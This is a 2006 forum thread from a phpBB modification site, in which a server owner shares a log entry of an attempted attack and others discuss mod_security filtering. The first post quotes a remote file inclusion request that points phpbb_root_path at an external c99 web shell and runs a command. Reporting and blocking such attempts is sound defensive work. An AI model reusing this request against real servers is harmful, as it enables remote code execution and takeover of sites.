IntegraMOD

Home of phpBB Integrated Modifications
https://integramod.com/forum/

Hacking Attempt?

https://integramod.com/forum/viewtopic.php?f=53&t=2089

Page 1 of 1

Hacking Attempt?

PostPosted: Tue Sep 12, 2006 7:53 pm
Author: Bush
I seen this in my logs of my Dedicated Linux server for my site.

GET /portal///includes/functions_portal.php?phpbb_root_path=http://www.festivalrilke.ch/files/upload/c99shellb16.txt?&cmd=id HTTP/1.1

If you click the URL within the GET command you'll see an elaborate script that is trying to be executed. Thank god I have mod_security installed and it was able to block/deny the phpbb_root_path command from being executed.

PostPosted: Wed Sep 13, 2006 1:15 pm
Author: Michaelo
It denies the GET command and not the php_root_path...
The current security updates prevent this...

PostPosted: Wed Sep 13, 2006 4:36 pm
Author: computerz
"Michaelo";p="15390" wrote:It denies the GET command and not the php_root_path...
The current security updates prevent this...


It will deny the phpbb_root_path element if it is specified in the filters. I made a post on this below. I also have similar exploit attempts in my logs and they're not using a GET statement, but they're still getting blocked because of the phpbb_root_path parameter is being filtered in my rule set.

PostPosted: Thu Sep 14, 2006 4:33 am
Author: Michaelo
Must be updates since the breach... <img>
All times are UTC - 8 hours [ DST ]
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Group
https://www.phpbb.com/